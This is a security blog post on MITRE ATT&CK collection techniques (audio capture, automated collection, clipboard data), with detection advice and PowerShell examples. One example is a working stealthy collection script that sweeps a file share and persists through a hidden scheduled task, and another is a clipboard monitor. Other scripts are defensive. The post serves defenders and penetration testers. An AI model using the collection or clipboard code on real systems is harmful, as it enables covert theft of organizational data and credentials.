ATT&CK Series: Collection Tactics
September 10, 2019
While gaining and maintaining a foothold in a network are some of the first hurdles an attacker must overcome, what they are after is data – be it in the form of corporate intelligence, trade secrets, financial information, or client records. Attackers can then sell this data to the highest bidder, use it for personal gain, or simply use it as a way to embarrass or potentially blackmail an organization.
During our penetration testing engagements, to demonstrate potential impact on clients, members of Optiv’s Threat Management team typically seek out the same data an attacker would be seeking. “Getting Domain Admin” is not always (and should not be) the primary goal of a penetration test, as many times we can achieve the same demonstration of impact without that level of access.
In this post, we will look at some of the techniques that fall under MITRE ATT&CK's Collection tactic, from an attacker's point of view. The techniques covered here are only some of the methods adversaries use to harvest organizational data; this is not a comprehensive list. Now that we have a better idea of what "collection" entails, let's dive into the first three techniques: audio capture, automated collection, and clipboard data.
Audio Capture (T1123)
Thousands of conversations take place over the course of a typical workday, many confidential in nature. Often, executives will choose not to communicate highly sensitive information over email or other written channels precisely because those leave a paper trail, and will instead discuss such topics only verbally. Consider the intelligence a competitor could gain from a 24x7 listening device in the boardroom, in a member of the legal team's office, or in the CEO's office.
Audio capture entails enlisting a compromised device to serve as a listening post in the victim organization. An attacker can use the device’s built-in microphone to eavesdrop on conversations in real-time or save the audio capture to a file and exfiltrate it at a later date.
What's the Risk?
As organizations put more and more IoT devices on the network, each becomes a potential attack vector. If a device with a microphone is compromised, be it a smart speaker, desktop computer or IP phone, an attacker could use that device to eavesdrop on whatever physical area it is located in. Given that many organizations use descriptive asset naming conventions such as BOARDROOM-PC or CEO-DESKTOP, an attacker who has already performed discovery can easily pick out these devices as high-value targets for audio capture.
Detection and Mitigation
This technique can be challenging to defend against from a purely software or configuration perspective. Hardware solutions exist that effectively render a device's built-in microphone useless: a dummy plug that presents itself as an external microphone, so the system switches input to it, but contains no component that captures audio. Depending on the device, another option is to disable the microphone in the BIOS/UEFI setup. Also be aware of other devices attached to the host, as users may have a secondary microphone attached to the system, such as one built into an external webcam, a headset, or a separate USB microphone; a dummy plug or a BIOS setting does nothing about those.
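On the detection side, Windows 10 (1903 and later) keeps a per-user record of which programs have used the microphone under the CapabilityAccessManager ConsentStore registry key, including start and stop timestamps. The script below is an added example, not code from the original post or from Optiv: it walks every loaded user hive and lists the classic (non-packaged) executables with recorded microphone use. The registry path, the value names and the convention that a stop time of zero means the device is still open are assumptions based on how current Windows builds populate that key; not every capture path is guaranteed to be recorded there, so treat it as one data point, not proof of absence.

```powershell
# Added example (not from the original post): list non-packaged programs that Windows has
# recorded as using the microphone, for every user hive currently loaded on this host.
# Assumes Windows 10 1903 or later; reading other users' hives requires administrator rights.
function Get-MicrophoneUsage {
    $hives = Get-ChildItem Registry::HKEY_USERS |
        Where-Object { $_.PSChildName -match '^S-1-5-21-\d+-\d+-\d+-\d+$' }   # real user SIDs only

    foreach ($hive in $hives) {
        $base = "Registry::$($hive.Name)\Software\Microsoft\Windows\CurrentVersion" +
                "\CapabilityAccessManager\ConsentStore\microphone\NonPackaged"
        if (-not (Test-Path $base)) { continue }

        foreach ($app in Get-ChildItem $base) {
            $p = Get-ItemProperty -Path $app.PSPath
            # Timestamps are stored as 64-bit FILETIME values (UTC).
            $start = if ($p.LastUsedTimeStart) { [DateTime]::FromFileTimeUtc($p.LastUsedTimeStart) } else { $null }
            $stop  = if ($p.LastUsedTimeStop)  { [DateTime]::FromFileTimeUtc($p.LastUsedTimeStop) }  else { $null }

            [PSCustomObject]@{
                UserSid    = $hive.PSChildName
                Executable = $app.PSChildName -replace '#', '\'   # path separators are stored as '#'
                LastStart  = $start
                LastStop   = $stop
                # Assumption: while a program holds the microphone open, LastUsedTimeStop is 0.
                InUseNow   = [bool]($start -and ($p.LastUsedTimeStop -eq 0))
            }
        }
    }
}

# Usage: newest activity first; anything you do not recognize on a BOARDROOM-PC deserves a look.
Get-MicrophoneUsage | Sort-Object LastStart -Descending | Format-Table -AutoSize
```

Store (packaged) apps are recorded under sibling keys named after the package rather than under NonPackaged, so extend the search if your environment uses them. Because the key lives in each user's hive, it is also worth collecting as part of a triage image rather than only querying it live.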
Automated Collection (T1119)
Recall that attackers are usually after data, and that once an attacker has a foothold in the network along with some form of persistence, the next step is to find and exfiltrate that data. Attackers can automate this process through various means such as batch files, shell scripts, or functionality built into their remote access toolset. Additionally, attackers can set these scripts to run under a repeating scheduled task so the collection keeps running without further interaction.
In large networks, automated collection increases the speed at which an attacker can collect data from hundreds or thousands of machines. Attackers can narrow down their focus so that only files with a specific extension are collected and sent off to their command and control server. Automating the collection process also ensures that if any new data is added to a repository being monitored, it will be included in the next round of collection.
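To make the description above concrete, here is an added example (not code from the original post or from Optiv) of a small automated-collection job of the kind described: it sweeps a share for documents by extension, copies only files changed since the previous run so that newly added data is picked up each round, stages them in one folder, and registers a daily scheduled task to repeat the sweep. The share path, staging directory, extension list, task name and schedule are all assumptions chosen for illustration.

```powershell
# Added example (not from the original post): incremental, scheduled collection of documents
# from a file share. Every name and path below is an assumption for illustration only.
$Share      = '\\FILESERVER\Finance'        # assumed target share
$Staging    = 'C:\Windows\Temp\.cache'      # assumed staging directory (innocuous-looking on purpose)
$Extensions = '*.docx', '*.xlsx', '*.pdf', '*.pst'
$StateFile  = Join-Path $Staging 'lastrun.txt'
$TaskName   = 'CacheMaintenance'            # assumed task name, chosen to blend in

function Invoke-Sweep {
    New-Item -ItemType Directory -Path $Staging -Force | Out-Null

    # Incremental sweep: only files modified since the previous run are collected.
    $since = if (Test-Path $StateFile) { [DateTime]::Parse((Get-Content $StateFile -Raw).Trim()) }
             else                      { [DateTime]::MinValue }
    $runStarted = [DateTime]::UtcNow

    Get-ChildItem -Path $Share -Recurse -File -Include $Extensions -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTimeUtc -gt $since } |
        ForEach-Object {
            # Preserve the relative path so collisions between folders do not overwrite files.
            $rel  = $_.FullName.Substring($Share.Length).TrimStart('\')
            $dest = Join-Path $Staging $rel
            New-Item -ItemType Directory -Path (Split-Path $dest) -Force | Out-Null
            Copy-Item -Path $_.FullName -Destination $dest -Force
        }

    $runStarted.ToString('o') | Set-Content $StateFile
}

Invoke-Sweep

# Persistence: repeat the sweep every morning so anything added to the share is picked up.
if (-not (Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue)) {
    $action  = New-ScheduledTaskAction -Execute 'powershell.exe' `
                 -Argument "-NoProfile -WindowStyle Hidden -File `"$PSCommandPath`""
    $trigger = New-ScheduledTaskTrigger -Daily -At 3am
    Register-ScheduledTask -TaskName $TaskName -Action $action -Trigger $trigger | Out-Null
}
```

Every step here is something an administrator might legitimately do, which is the point of the next section: nothing in this script is malicious on its own, so the defender has to notice the pattern (one account reading an unusual volume of files, a new scheduled task launching a hidden PowerShell process, a growing directory of copied documents) rather than any single action.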
What's the Risk?
Automated collection allows an attacker to gather large quantities of data quickly and easily. Depending on the technique, these processes may slip under the radar of EDR solutions, since many of the actions taken involve regular day-to-day activities that a legitimate business user might undertake. Copying files to and from a network share, executing batch or bash scripts, and other data management processes are all tasks that a sysadmin performs daily, which can aid an attacker in blending in with normal network traffic.
Detection and Mitigation
Since many techniques of automated collection can be misconstrued as legitimate traffic, detection and mitigation can be difficult. Understanding your network’s baseline can be beneficial in helping spot anomalous activity. Since a typical office employee carries out many of the same functions daily, a deviation from their normal routine could be indicative of malicious activity. While it can be difficult in larger organizations, knowing and understanding your company’s job functions can help defenders to detect when an employee is doing something that isn’t within their daily norm.
For larger organizations, user and network behavioral analytics solutions can help uncover these deviations from the norm. Monitoring east-west traffic (host to host and server to server inside the network) is just as important as monitoring north-south traffic (traffic crossing the perimeter to and from the internet), because collection activity such as share enumeration and bulk file reads is almost entirely east-west and never touches the perimeter until the data is exfiltrated. Network devices and operating systems can produce mountains of data about user activity, and behavioral analytics tooling exists to capture that data, analyze it against the baseline, and alert security staff to potential threats.
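One concrete baseline check for the automated collection described above is to count how many distinct files each account reads from a file server in a short window. The script below is an added example, not code from the original post or from Optiv: it parses Security event ID 5145 (Detailed File Share, which must be enabled through the "Audit Detailed File Share" subcategory) on a Windows file server, buckets the events by account, source address and time window, and reports any bucket whose distinct-file count exceeds a threshold. The window length and threshold are assumptions; the whole value of the check comes from tuning them against what your own users normally do.

```powershell
# Added example (not from the original post): flag accounts that touch an unusually large
# number of distinct files on this file server within a short window, from Security event 5145.
# Window size, threshold and lookback are assumptions to be tuned against your baseline.
param(
    [int]$WindowMinutes         = 10,
    [int]$DistinctFileThreshold = 500,
    [int]$LookbackHours         = 24
)

$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 5145
    StartTime = (Get-Date).AddHours(-$LookbackHours)
} -ErrorAction SilentlyContinue

$bucketTicks = [TimeSpan]::FromMinutes($WindowMinutes).Ticks

# Flatten each event's EventData into one row per file access.
$rows = foreach ($e in $events) {
    $d = @{}
    ([xml]$e.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
    [PSCustomObject]@{
        Time    = $e.TimeCreated
        Account = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
        Source  = $d.IpAddress
        File    = "$($d.ShareName)\$($d.RelativeTargetName)"
        Bucket  = [math]::Floor($e.TimeCreated.Ticks / $bucketTicks)
    }
}

# One group per (account, source host, time window); alert on the ones that read too much.
$rows | Group-Object Account, Source, Bucket | ForEach-Object {
    $distinct = @($_.Group.File | Sort-Object -Unique).Count
    if ($distinct -ge $DistinctFileThreshold) {
        # Extension mix helps tell a document sweep from, say, a build job reading source files.
        $exts = $_.Group.File |
            ForEach-Object { [IO.Path]::GetExtension($_).ToLower() } |
            Group-Object | Sort-Object Count -Descending | Select-Object -First 3
        [PSCustomObject]@{
            Account       = $_.Group[0].Account
            Source        = $_.Group[0].Source
            WindowStart   = ($_.Group.Time | Measure-Object -Minimum).Minimum
            DistinctFiles = $distinct
            TopExtensions = ($exts | ForEach-Object { "$($_.Name)=$($_.Count)" }) -join ', '
        }
    }
} | Format-Table -AutoSize
```

Event 5145 is extremely high-volume on a busy file server, so in practice this aggregation belongs in the SIEM or log pipeline rather than in an ad hoc script on the server; the logic is the same either way. Service accounts and backup jobs will trip the threshold constantly and need their own baselines or an exclusion list.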
Identifying the applications that belong on the network and implementing application control (Windows Software Restriction Policies, AppLocker, or a comparable allowlisting tool) can prevent some automated collection techniques. By defining which applications should be running in the environment, defenders can block applications that are not on the list and receive alerts when something not on that list attempts to execute. Keep in mind that collection done with built-in tools such as cmd, PowerShell or robocopy will pass an allowlist, so this control complements monitoring rather than replacing it.
Finally, file encryption and off-line storage of highly sensitive information can potentially thwart attackers from harvesting data. In the case of file encryption, even if an attacker gains access to the data, they will be unable to read it unless they can also obtain the decryption key; note that this only holds when the key is not available to the compromised account, so data that a logged-in user's session decrypts transparently (for example through EFS or an unlocked encrypted volume) is just as exposed to collection run under that user. Off-line storage, while sometimes impractical, removes the data from the network altogether, significantly decreasing the odds of unauthorized access.
Clipboard Data (T1115)
An attacker can gain valuable information by monitoring a victim's clipboard. Users frequently copy and paste sensitive information such as usernames and passwords between applications. Additionally, as more and more users adopt password managers, these applications typically place credentials on the clipboard for the user to paste into the application they are logging in to; many password managers clear the clipboard after a configurable timeout, but the secret is readable by any process on the host for as long as it sits there.
What's the Risk?
Accessing clipboard data along with installing keyloggers (ATT&CK Technique T1056) gives an attacker a wealth of information about a user and organization. Anything from credentials to confidential financial data can be present in the user’s clipboard.
Detection and Mitigation
Since copying to and pasting from the clipboard is a normal day-to-day activity for most users, monitoring for unauthorized clipboard access is difficult. On Windows, any process running as the user can read the clipboard through the standard clipboard APIs, and no event log records who did so. Endpoint tooling that hooks or logs those API calls, or memory analysis of a suspect process, can show which applications are reading the clipboard, but doing so in real time is hard and requires extra effort to correlate what the user was doing at the time of access.
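The following is an added example (not code from the original post or from Optiv) of a clipboard monitor of the kind the technique describes, intended for a lab: it polls the clipboard, and every time the contents change it records a timestamp, the title of the foreground window, the length of the value and a masked preview. The foreground window title is exactly the correlation the text above says defenders lack, and it is what lets an attacker tell a password copied from a password manager apart from ordinary text. The output path and the polling interval are assumptions.

```powershell
# Added example (not from the original post): log clipboard changes together with the
# foreground window title. Run it in a lab, copy a credential from a password manager,
# and see how long the value stays readable. Output file and interval are assumptions.
Add-Type -Namespace Demo -Name Win32 -MemberDefinition @"
[DllImport("user32.dll")]
public static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll", CharSet = CharSet.Unicode)]
public static extern int GetWindowText(IntPtr hWnd, System.Text.StringBuilder text, int count);
"@

function Get-ForegroundTitle {
    $sb = New-Object System.Text.StringBuilder 512
    [void][Demo.Win32]::GetWindowText([Demo.Win32]::GetForegroundWindow(), $sb, $sb.Capacity)
    $sb.ToString()
}

$log  = Join-Path $env:TEMP 'clip.log'   # assumed output file
$last = $null
Write-Host "Logging clipboard changes to $log (Ctrl+C to stop)"

while ($true) {
    $text = Get-Clipboard -Raw -ErrorAction SilentlyContinue
    if ($text -and $text -ne $last) {
        $last = $text
        # Mask the value: the point of the demo is to show that a secret was exposed and
        # from which window, not to keep a plaintext copy of it on disk.
        $preview = if ($text.Length -gt 6) { $text.Substring(0, 3) + '...' + $text.Substring($text.Length - 3) }
                   else                    { '***' }
        "{0:o}`t{1}`t{2} chars`t{3}" -f (Get-Date), (Get-ForegroundTitle), $text.Length, $preview |
            Add-Content -Path $log
    }
    Start-Sleep -Milliseconds 250
}
```

Watching the log while using a password manager makes the mitigation side obvious: a manager that clears the clipboard after a few seconds, or that types credentials via auto-fill instead of the clipboard, shrinks the window an attacker has to read the value, and the monitor shows whether yours actually does so.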
The three collection tactics covered above are stealthy and effective ways for attackers to gain information about an organization. As we have seen, defending against any of these techniques is difficult, and it is critical for defenders to know their network baseline as thoroughly as possible to help spot suspicious activity. Knowing what applications and processes should be running on a standard workstation or server image will also help, as any deviation from those norms should be investigated.
As with most ATT&CK techniques, proper monitoring and thorough visibility into your networks and systems are key to early detection. Microsoft publishes a list of Windows security events that should be monitored at a minimum in Appendix L ("Events to Monitor") of its "Best Practices for Securing Active Directory" guidance. Since the three techniques above blend easily into normal activity, identifying them as actively in use will most likely happen during a larger investigation rather than from a single alert. Microsoft also has a good article, "Monitoring Active Directory for Signs of Compromise," that covers monitoring your AD infrastructure and configuring a solid audit policy for event logging and alerting.
Keep in mind that despite having everything configured perfectly, all relevant logs being monitored, and the most advanced EDR solutions available, adversarial tactics are always changing. Staying up to date on the latest tools and techniques, and adapting your environment to react accordingly is critical to a successful defense.
Read more in Optiv’s ATT&CK series. Here's a review of related posts on this critical topic:
- ATT&CK Intro - September 2018
- ATT&CK Initial Access - October 2018
- ATT&CK Privilege Escalation - November 2018
- ATT&CK Discovery - March 2019
- ATT&CK Persistence - April 2019
- ATT&CK Credential Access - April 2019
- ATT&CK Execution - May 2019
- ATT&CK Defense Evasion - May 2019
- ATT&CK Lateral Movement Techniques - June 2019
- ATT&CK Exfiltration - July 2019